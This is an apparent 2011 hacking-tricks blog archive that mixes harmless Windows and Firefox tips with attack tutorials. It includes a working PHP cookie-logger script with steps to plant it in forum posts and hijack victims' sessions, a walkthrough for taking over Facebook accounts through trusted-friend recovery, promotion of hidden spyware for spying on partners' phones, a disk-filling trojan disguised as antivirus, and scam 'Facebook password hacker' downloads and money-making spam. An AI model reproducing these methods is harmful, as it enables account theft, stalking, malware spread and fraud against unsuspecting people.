Thursday, December 29, 2011

How to use facebook profile pictures as emiticons in facebook chat

Facebook chat is the most commonly used today to chat as he has excluded all other players in the market that claim to be a social network. The platform with over 800 million users a lot of very interesting emoticons that are used on a regular basis. And one of the new feature is that when you are chatting with any of our friends at Facebook and if we want to use the profile picture of any Facebook (including non-friend), page or event such as emoticons, you can do so by following these simple instructions :
1. Connect to the URL for the profile, event or page that you want to insert as smileys. Note that, in the address bar of your browser, you will see an ID or the nickname / name related to profile / page : it will be what we will need to enter the emoticons.

2. Write in a chat window [[PROFILE_ID]] (if you have the ID in the URL) or [[nickname]] or [[page_name]] (if it is the nickname or the name of the page in the URL)

3. Press enter and you will something like the following:


If a Facebook profile is publicly visible and you know its URL, anyone can use it to supplement the profile photo as smileys to the chat. Locked pages or groups that require an invitation to become members, but will show blank thumbnail.

These emoticons are viewable only by the web version and do not work in mobile applications , like Facebook for Android and Facebook for iPhone / iPad.You can still send emoticons by phone but the thumbnails will appear only to the recipient and only if it uses the web version! Here’s an example:



Tuesday, December 27, 2011

How to Hack Facebook with security Question Vulnerability?

You can bypass the security question and hack the friend's face book account with 2 mutual Friends.

Facebook Feature(drawback)?
Facebook provides option to recover your account with security question. But if you forget the answer , still you can recover with your 3 friends account.


How the Hackers hack the facebook accounts?
if they are not your friends, they may request with 3 fake facebook accounts to become a friend. if they are your friend, it is very simple to hack your account.

At first hacker will visit the forget password page of facebook. and search for your/victim account with their details (if he want to hack means, definitely he analyze completely about you). So he will enter the details of yours and find your account.




Select "This is my account" and click the next button. Facebook will show the password recovery option. But simply you can bypass this by clicking "No longer have access to these?"

Facebook will ask you to enter the new email address. When you enter, it will ask you to answer for the "Security Question". Here is the major security hole of the Facebook. Facebook provides here to recover the password in another way, when you don't know the security question answer. You can recover/hack the account with three friends of the account.

If you answer three times wrongly for the security question, it will bring you to the recover the account with friends page. So if you select any trusted friends, the security code will be send to the friends. By getting all security codes, you can gain access to the account. The main drawback is that hackers can be a friend. He can select 3 trusted friends as his fake profile. Now your account will be hacked.


So sad..!!! Don't worry ..!! i am here to give you some security tips to protect your account from hackers.

Facebook Security Tips
Don't Set "Security Question" for your Facebook account.
Register your mobile: This is best security provided by Facebook.com.
Login to your facebook account
click the Account->Account Settings
click the change button near to the Account security
Select the third option i.e. "Login Approvals. This means that facebook account will send message to your mobile whenever you/hacker logins from different system.
Enter your own mobile number.
oh i forget to ask you 1 thing. are you from your own system? if you yes, you will have some additional security. if you have public cafe, sorry your account can not use this security option.
Enter your computer name.




That's all your account is safe until there is another vulnerability found by hackers. Keep in touch , i will give you security tips for you.

Sunday, December 25, 2011

X-Scan by XFocus – Basic Free Network Vulnerability Scanner

X-Scan is a general scanner for scanning network vulnerabilities for specific IP address range or stand-alone computer by multi-threading method, plug-ins are supported. This is an old tool (last update in 2005), but some people still find it useful and there are certain situations where it can be useful (especially in those jurassic companies using old kit).

It supports Nessus NASL plugins for vulnerability scanning – which makes it pretty useful. It also has both a GUI and command line version for scripting.

The following items can be scanned:
Remote OS type and version detection,
Standard port status and banner information,
SNMP information,
CGI vulnerability detection,
IIS vulnerability detection,
RPC vulnerability detection,
SSL vulnerability detection,
SQL-server,
FTP-server,
SMTP-server,
POP3-server,
NT-server weak user/password pairs authentication module,
NT server NETBIOS information,
Remote Register information, etc.


The results of the scan are saved in /log directory, and are title index_ip_address.htm (if you used the GUI) or ip_address if you used the command line option. These can be directly browsed by any normal Web Browser.

Basic user and password lists are supplied to carry out a basic attack on certain services, (above), if found enabled on the host.

You can download XScan v3.3 here:

X-Scan-v3.3-en.rar

Create a CookieLogger & Hack any Account

Create a CookieLogger & Hack any Account

A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger..

Step 1: Save the notepad file from the link below and Rename it as Fun.gif

Download it.
Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>
Step 3: Create a new Notepad File and Save it as logfile.txt
Step 4: Upload this file to your server
cookielogger.php -> http://www.yoursite.com/​cookielogger.php
logfile.txt -> http://www.yoursite.com/​logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/​fun.gif
Step 5: Go to the victim forum and insert this code in the signature or a post :
Download it.
Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:
phpbb2mysql_data=a%3A2%3A%7Bs%​3A11%3A%22autologinid%22%3Bs%3​A0%3A%22%22%3Bs%3A6%3A%22useri​d%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41​737ed6eb41c43a4ec9
Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.
Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.

Tuesday, December 13, 2011

Want to Spy Mobile Phone - Tutor for Spying Mobile Phones

Well recently people discuss about the matter of cheating of the girlriend or boyfriend. So do you want to know how about them, to whom they talk,sms,they go? So you have secretly spy on their mobile phone for the SMS text messages, calls, GPS locations and other confidential info of your child’s or spouse’s mobile phone? Get here the tutorial on how to spy on mobile phones.

To spy on any mobile phone all you have to do is to install a good mobile phone spying software on the mobile phone to whom you want to spy on and once you do this you can silently record every SMS and information about each call. You can also see GPS positions every thirty minutes.

The best Mobile Phone Spy software recommended is Mobile Spy

Why to choose Mobile Spy?

There are many mobile phone spy software's in the market and hence people often get confused to which mobile phone spy software they choose. So People experimened and saw the good results and recommended for the Mobile Spy to go with.

Mobile Spy is one of the best and award winning mobile phone spy softwares in the market also with an affordable price. Mobile Spy team provides an exmobileent support and hence it becomes just so simplier to spy on any mobile phone you want to! As i mentioned previously the cheating cases of girlfriend and boyfriend have been increased so this is a useful software for them and also for the parents so they come to know what their children are doing? If you’re really serious to spy on a mobile phone then Mobile Spy is for you.Get a copy of Mobile Spy and expose the truth.

Mobile Spy is a perfect tool for parents to monitor their children’s activity on their mobile phone!

Mobile Spy Features

Mobile Spy is a hybrid spy software/service which allows you to spy on the mobile phone you want in real time. This unique system records the activities of anyone who uses the compatible mobile phone ( iPhone, Windows Mobile or Symbian OS smartphone). For this you need to install a small application onto the mobile phone. This application starts at every boot of the phone but remains stealth and does not show up in the running process list. It runs in the background and will spy on every activity that takes place on the phone. Thus the spying feature is completely undetected!

Logging Features

1. Spy on Calls Log – Each incoming and outgoing number on the phone is logged along with duration and time stamp.

2. Spy on SMS – Every text message/MMS is logged even if the phone’s logs are deleted. Includes full text.

3. Spy on Location – The phones’s current location is frequently logged using GPS when signal is available.

4. Spy on Web Activity – Each address entered into Internet Explorer (or any browser) on the phone is logged.

5. This mobile phone spy software works in total stealth mode. The person using the phone can never come to know about the presence of this spy software.

How it works

The working of Mobile Spy is very simple and needs no extra knowledge to install and use.

Step 1- After you purchase Mobile Spy you’ll get a link to download the software. Along with this you’ll get a username and password for you online control panel.

Step 2- Install the downloaded mobile phone spy software onto any of the compatible mobile phone. After installation the spy software starts recording all the activities on the mobile phone.

Step 3- Login to your online control panel to see the logs containing the recorded information.

This is just a small list of Mobile Spy features. For a list of compatible phones, step-by-step installation guide and more details visit the Mobile Spy Homepage

How to Hack Windows Administrator Password

This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.

Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.

* You do not need to know the old password to set a new one
* Will detect and offer to unlock locked or disabled out user accounts!
* There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.

How it works?

Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off your computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.

The download link for both CD and floppy drives along with the complete instructions is given below

Offline NT Password & Reg Editor Download

It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.

Saturday, December 3, 2011

Block Websites Without Software


This trick will help you to block websites without using software. Do the following simple steps to block website.

1. Go to C:\WINDOWS\system32\drivers\etc

2. Locate the file hosts.

2. Right click on it and open with notepad.

3. To block www.tricks-4u.co.nr just add the following text at the bottom of the file (after 127.0.0.1 localhost).

127.0.0.1 www.tricks-4u.co.nr

4. Save the file and exit.

Done!! Do the same procedure to block more websites. Now, open your web browser and go to www.tricks-4u.co.nr, it will not load! Try this trick now………..
Enjoy…….

Play Movie On MS Paint


MS Paint is commonly used to draw pictures. But we can also play movie on paint. Do the following steps to play movie on Paint.......

1) Play a movie in Windows Media Player or your favorite movie player.

2) Press Print Screen button on the keyboard while playing the movie (don’t stop it).

3) Start -> Programs -> Accessories -> Paint to open MS Paint.

4) Select Edit -> Paste or Press CTRL+V to paste.

Done!!! Now watch your favorite movie on Paint. But there are no buttons like Pause, Stop etc. Try this trick now.....Enjoy…..

Disable Windows Xp Boot Screen




You can disable the Windows Xp Boot Screen; which will speed up the overall boot process.
Note: If you remove the Boot Screen, you will not see any boot messages, such as check disk.
Do the following simple steps to disable Windows Xp Boot Screen.


1. Start > Run > and type “msconfig” to open System Configuration Utility (without quotes).

2. Click the BOOT.INI tab.

3. Go down to Boot Options and tick /NOGUIBOOT check box.

4. Click OK to save and close the System Configuration Utility.

5. Now restart your computer.


The Windows Xp boot screen will be gone. It can be re-enabled by un-ticking /NOGUIBOOT check box from the System Configuration Utility. Try this trick now......
Enjoy.......

Tuesday, November 29, 2011

The Question: How To Make Money Using The Internet?

We, At Global Associate & Consultants Aim To Be A World Class Multi Level Marketing Company

We, at Global Associate & Consultants aim to be a world class Multi Level Marketing company catering to the needs of a happy lot of potential Entrepreneurs and Networks in network marketing who want to make their to stardom tomorrow
Description
We offer a great opportunities... just making small investment by taking a product of Rs. 850/- . You can start your own business.Great opportunity for anyone, a housewife, student, unemployed, retired person and anyone who wants additional income in his/her spare timeOnline Marketing (S.E.O) Organisation
Description
Ad posting job -Work just 1- 2 hrs daily. We offer simple copy-paste ad posting jobs, suited for Students, Part-time Workers, House Wives & Retired Person from home & earn more than 10000 in a month. Payments guaranteed. A real project of part time jobs.

Sunday, November 27, 2011

HOW TO MAKE A TROJAN HORSE

Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a simple Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The source code for this Trojan is available for download at the end of this post. Let’s see how this Trojan works…

Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.


Now lets move to the working of our Trojan

The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the Windows\System32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.


The algorithm of the Trojan is as follows

1. Search for the root drive

2. Navigate to WindowsSystem32 on the root drive

3. Create the file named “spceshot.dll”

4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full

5. Once the drive is full, stop the process.

You can download the Trojan source code HERE Please note that I have not included the executabe for security reasons. You need to compile it to obtain the executable.

How to compile, test and remove the damage?


Compilation:

For step-by-step compilation guide, refer my post How to compile C Programs.

Testing:

To test the Trojan, just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.
NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.


How to remove the Damage and free up the space?

To remove the damage and free up the space, just type the following in the “run” dialog box.

%systemroot%\system32


Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.
NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: How to Change the ICON of an EXE file ?
Please pass your comments and tell me your opinion. I am just waiting for your comments…

Sunday, November 20, 2011

Firefox Funny Tricks


Firefox is one of best browser and there are some funny tricks that you can do with your firefox browser.These will not harm your browser and they are tested in the latest version of firefox i.e firefox 4.0

just copy and past the green code in mozilla address bar and watch magic......


chrome://global/content/alerts/alert.xul

it will show you dancing firefox.Your firefox window will automatically popup anywhere at screen.


chrome://browser/content/browser.xul
it will open another firefox within in a new tab.

chrome://browser/content/bookmarks/bookmarksPanel.xul
it will open your firefox bookmark manager in new tab.

chrome://browser/content/preferences/preferences.xul
it will open firefox options dialog box in new tab.

chrome://browser/content/history/history-panel.xul
it will open your history in new tab.

chrome://mozapps/content/extensions/extensions.xul?type=extensions
it will open your extensions tab in your current window.

chrome://browser/content/preferences/cookies.xul
it will Open the “cookies window” inside a tab in the Firefox window.

chrome://browser/content/aboutDialog.xul
it will Open the “About Firefox” Dialog box inside the tab.

chrome://browser/content/credits.xhtml
it will Open a scrolling list of names. The one’s who we must thank for creating Firefox

chrome://browser/content/preferences/sanitize.xul
it will Open the “Clear Private Data” window inside the current tab.

Thursday, November 17, 2011

Increase traffic To Your Site

Increase search engine rank

Increase your web-site search engine rankings

Be presented on search engines is one of the most critical ways to increase web-site traffic and show your content or service to people that might be looking for your product.
Most of the big search engines use a software to determine your web-site ranks.
They know how many sites are linking to your web-site; more referrers and hits better rank for your web site.
Get Higher Rank...

Promote to over 10 million customers

Advertise to over 10 million customers across the globe.

We promote your business in global network of affiliate sites, each with own targeted points of interests.
Our company gives you innovative advertising strategies that makes your business profitable on the Internet.
We will provide you with real and visible results and take your web-site to the next level.
Advertise to Over 10 Million users Now...

Get More Visitors

Get More Visitors, Get More Revenue!!!

With no day-to-day stream of shoppers you cannot have reliable around the clock sales.
It's not possible to get sales if no one visits your web-site. You need customers to see your web-site, every day, 24 hours!
Our company helps more than 30,000 clients get more shoppers online.
You can increase your sales by receiving thousands of real interested customers to see your website.
More Visitors...

Sunday, November 13, 2011

How to Earn Rs.25000 every month without Investment through part time jobs?

You can earn Rs.25000 the very first month from data entry jobs on internet. This is an easy work from home form filling job. Work less than 1 hr daily. No investment

Click On The IMage Below
Affiliate Program ”Get Money from your Website”

Saturday, November 12, 2011

Facebook Hack – View photo albums of non-friends
A new facebook exploit allows anyone to access any photo album of non-friends as long as you have the link.

By following the simple steps shown in above image, you can bypass the security of Facebook and view photos of others online.

Tuesday, October 18, 2011

Reset Your Mobile Memory Card Password in 2 minutes
We usually set password for our memory card for privacy and security, but the common mistake every one does at least once in out life time forgetting password. If you set password for mobile memory card, then you should be not forget the password. If you does then the only option is to formate your memory card with the help of the card reader an...d eventually the loss of all your data stored on it. There is a way to break the security wall. If you are a Symbian device lover then no need to worry about the password. You can crack them in few minutes.
In this tutorial I am going to teach you how to reset your memory card password in easy step. Before we start you need to have X-plore (application used to explore your system files and folder even the hidden folders in your device)
Step1: Install X-Plore in your mobile. If you want to download X-Plore search around internet you can download free trail.
Step2: Open your X-plore apps and Press 0(Zero) and check which you have marked the "show the system files"
Step3: Once you done that now go to the following path C:/Sys/Data/Mmcstore
Step4: Once you reached there you need to press "3" under option to set it in the Hex-viewer
Step5: See the third column you will able to see a line of code ! TMSD02G (c??"?x???6?2?6?2?6). Just check the character between the "?" it is your password ie: 62626
Note: If you have not set the password, then you will not able to gain access to C:/Sys/Data

BSNL 3G Hack

BSNL 3G Hack! Browse Internet at 120 Kbps For Free
Today I am going to show how to hack BSNL 3G hack and browse unlimited internet at high speed up to 120 Kbps. I am not sure whether this hacking is still working or not, members from other forums are posting that this hack is working fine for them.
Before you start learning how to hack you need to have BSNL 2G SIM and ultimately 3G support mobile... phone.
Just follow up the instruction:
Recharge your 2G SIM with Rs 1 to convert it to 3G SIM and use them for free hours
Check the balance by dialing *123#, the message will show that your GPRS free usage is ZERO MB
Now recharge again with Rs 1 to convert in to 2G SIM
Now recharge with Rs 274 for unlimited GPRS usage for 2G SIM
Now again recharge with Rs 1 to convert in to 3G SIM
Thats it You have hacked your BSNL 3G for unlimited browsing check the GPRS free usage by dialing *123# it will show 6 GB free usage.
Hope it will work for you! Try it and share you thought with us!
Today I am going to show you how to change the default font of Nokia to some other cool font that might be in love. I like to share some font here that is already created by some one else. Thanks for the creator. And you can found this type of font all around internet for free.
I have attached the two font and the font removal application to delete the font. Download all the 3 attachment and sav...e it on your PC.
CalibrEras.zip ( Font File) http://j.mp/qM7pvl
Corbel.zip (Font File) http://j.mp/nSDjaw
FontRemover.zip (Font Remover Application SIS apps for your Nokia mobile)
http://www.mobile101.net/wp-content/uploads/2010/07/FontRemover.zip
Before you are going to install the font make sure that you need the following application that help you to crack down your mobile:
You need to have X-plore on your mobile and the make sure that your system, hidden folders are enabled
Extract the files inside the font zip folder to the following path C:\System\Fonts\ with the help of X-plore application. Make sure that you have extracted all the three files inside the font zip, If you upload only the TTF file the font will not install on your mobile. Put all three files Font TTF file, FontRouter and Freetype. Once you done restart your mobile to change the fond effect.
If you don't like the font you can easily delete the files using the FontRemover application.
Remember that you are extraction font into C:\System\Fonts\ EXACTLY
Note: If your mobile phone is running with Symbian (S60V2) operating system like ( N70 Series) you need to install the font folder might be C:\Resource\Fonts\
Hope you enjoy with this hack :) Meet you with another hack.
Is your computer “male” or “female”?
1. Open Notepad
2. Type the following line in notepad:
CreateObject("SAPI.SpVoice").Speak"I love you"
... 3. Save file as computer_gender.vbs
4. Run the file.
If you hear a male voice, your pc is a boy ;)
If you hear a female voice, your pc is a girl :)

Sunday, May 29, 2011

Facebook Password Hacking - Facebook Password Retriever PRO (FPRP)


Facebook Password Retriever PRO is a convenient tool that gives it's user the ability to retrieve any Facebook account password without the user's authorization. Facebook Password Retriever PRO allows you to monitor your child's or spouse's behavior when you are not at home - a convenient tool for worried parents and spouses. This easy-to-use tool can meet all youFacebook password retrieval needs. Facebook Password Retriever PRO is now available for download free of charge for a limited period of time, grab your copy while you can!
Facebook Password Retriever PRO: Free Download (Free for the next 10 days only!)


This application has been created with the intent to help users looking to hack their way into Facebook accounts. You have most likely already searched on the internet countless times on "how to hack Facebook" or Facebook password hacking" to no avail. Facebook hacker pro offers its user the ability to crack Facebook accounts in less than 30 seconds per account. Facebook hacking has never been as easy and fast as it is now. All that's required on your end to get started and to do your first Facebook password crack is to download our free Facebook hacking software and install it on your system now!. We are offering this software free of charge in attempt to help the thousands of people who do to not know how to hack Facebook account passwords and are in dire need for such a service due to spousal infidelity and its rising prevalence.

Hack facebook Password


Hack Facebook Password


If you have been looking for how to hack into a facebook account then this site is for you. With our free hacking tool you can obtain the password to nearly any profile on facebook.com. Simply follow the download link and run the program. Enter the details of the profile you want such as name, email and ID, then the tool will attempt the extract their password from the server. This program has been developed by underground hacking communities and we have put it online for anyone to use, for free!
  • Just download the tool and run it. Simple.
  • Hack any facebook account password
  • Absolutely Free
  • Will download the original password in plaintext so you log straight in
  • Used by many underground forums and communities
  • Safe to download - Virus Scan results
  • Obtains the original password so the victim will not know they have been hacked
  • 90% success rate. You can not hack admin, moderator, high profile or celebrity accounts
  • We will continously update the software if facebook.com ever patch the security holes

How to hack facebook account passwords


Step One: Email

Please send an email with the subject line 'DOWNLOAD' to the following email address: email@hackfacebookpasswords.net
This is so we can add your email address to the allow list to activate the hack tool. This is so we can restict who uses our software and to stop abuse.

Step Two: Download

Download:fbsoft.exe

The Facebook Hack Tool has been developed to run on any Windows platform (XP, Vista, 7 etc). If you run Mac OSx, Linux or any other platform, please contact us and we will let you know when we have those versions. This download is in .exe format so simply download and save into your documents. As with anything you download online, scan with your anti virus to be safe. Once you are happy, run the program and go to step 3. 

Step Three: Run
  • Once you have completed step 2 and the program is running...
  • In the first textbox type their facebook ID or Username
    (eg. http://www.facebook.com/profile.php?id=1234567890)
  • To increase the success rate you can provide the folllowing additional info.
  • [Optional] Enter their Full Name.
  • [Optional] Enter their Date of Birth in the format of DD/MM/YYYY.
  • [Optional] Enter their Email Address.
  • To activate the program, you need to enter the Auth code - please see Step 4.
  • Click 'Run Exploit'. The program will then run the exploit and attempt to extract the victims password.
  • To program is designed to run via multiple proxies to keep you completely anonymous.
  • If successful, the original password will be shown in plaintext.
  • Simply copy and paste the password and log into their account.
Step Four: Auth Code
    If you are using the Free version of this software available on this site, you will need to obtain an Auth code to run the program. This type of software/exploit does not come cheap on the internet - feel free to look around for other free versions - they don't exist! Hiring professional hackers costs hundreds and obtaining a working exploit for facebook is very rare. We do not charge you for using our software, but we do ask that you fill in a few quick free surveys/offers as a thanks for our work. The Auth Code/Password will become available once you have fully completed a survey.

Trace Ip Address To A Location.